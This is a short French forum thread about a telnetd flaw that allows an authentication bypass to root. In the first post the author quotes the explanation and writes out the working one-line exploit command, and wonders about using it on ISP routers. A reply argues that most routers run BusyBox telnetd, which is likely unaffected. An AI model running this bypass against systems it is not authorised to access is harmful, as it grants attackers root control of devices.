Pages: [1]   En bas

Auteur Sujet: Faille Telnetd  (Lu 128 fois)

darkmoon, kgersen et 1 Invité sur ce sujet

rooot

  • Abonné RED by SFR fibre FttH
  • *
  • Messages: 3 059
  • 🔵🔵🔵🔵⚪⚪⚪⚪🔴🔴🔴🔴
Faille Telnetd
« le: Aujourd'hui à 08:27:19 »
Salut a tous,
suite a la lecture de cette news : https://korben.info/telnetd-faille-root-exploit.html
certains d'entre vous ont ils testé sur leur ONT externe SFR ? ou leur ONT SFP car il me semble que telnet est actif sur certains firmware. Je ne sais plus si la box NB6VAC n'a pas son telnet activé aussi ?!

Citer
En gros, le serveur telnetd passe la variable d'environnement USER directement à la commande login sans la nettoyer. Du coup, un attaquant n'a qu'à définir USER sur -f root

 et utiliser telnet -a pour se retrouver connecté en root.

Donc si je comprends bien :
USER='-f root'
telnet -a 192.168.x.x

ici je vois qu'ils mettent tout sur la meme ligne : https://medium.com/@shivam_bathla/telnetd-auth-bypass-to-root-f6e239d692b5
Code: [Sélectionner]
USER="-f root" telnet -a IP_ADDRESS [PORT]
Cette astuce va etre utile pour rooter certains routeurs et faciliter leur passage sous openwrt  ;D
IP archivée

hwti

  • Abonné Orange Fibre
  • *
  • Messages: 2 868
  • Chambly (60)
Faille Telnetd
« Réponse #1 le: Aujourd'hui à 19:12:15 »
GNU Inetutils est GPLv3, donc normalement on ne devrait pas le trouver sur des routeurs fermés, puisque la licence est censée garantir la possibilité pour l'utilisateur de remplacer le programme (clause anti Tivoïsation).

Les routeurs utilisent probablement le telnetd de BusyBox, qui n'est à priori pas affecté.
IP archivée
Pages: [1]   En haut